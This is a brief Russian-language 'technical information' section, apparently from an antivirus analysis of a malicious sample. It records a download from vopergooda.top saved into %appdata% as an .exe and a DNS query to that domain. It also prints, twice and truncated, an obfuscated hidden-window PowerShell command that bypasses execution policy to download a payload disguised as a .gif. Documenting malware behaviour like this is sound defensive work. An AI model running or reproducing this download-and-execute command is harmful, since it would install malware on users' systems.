Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWeRSheLl.exE -eXECuTIONpOlicY BypAsS -nOprofiLe -WiNdOwStYLe HIdden (NeW-ObJeCt SYsTem.net.webclIeNt).dOwNlOAdfIle('http://www.vopergooda.top/read.php?f=1.gif','%apPDaTA%.E...
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /C "pOWeRSheLl.exE -eXECuTIONpOlicY BypAsS -nOprofiLe -WiNdOwStYLe HIdden (NeW-ObJeCt SYsTem.net.webclIeNt).dOwNlOAdfIle('http://www.vopergooda.top/read.php?f=1.gif','%apPDaTA%.E...' (со скрытым окном)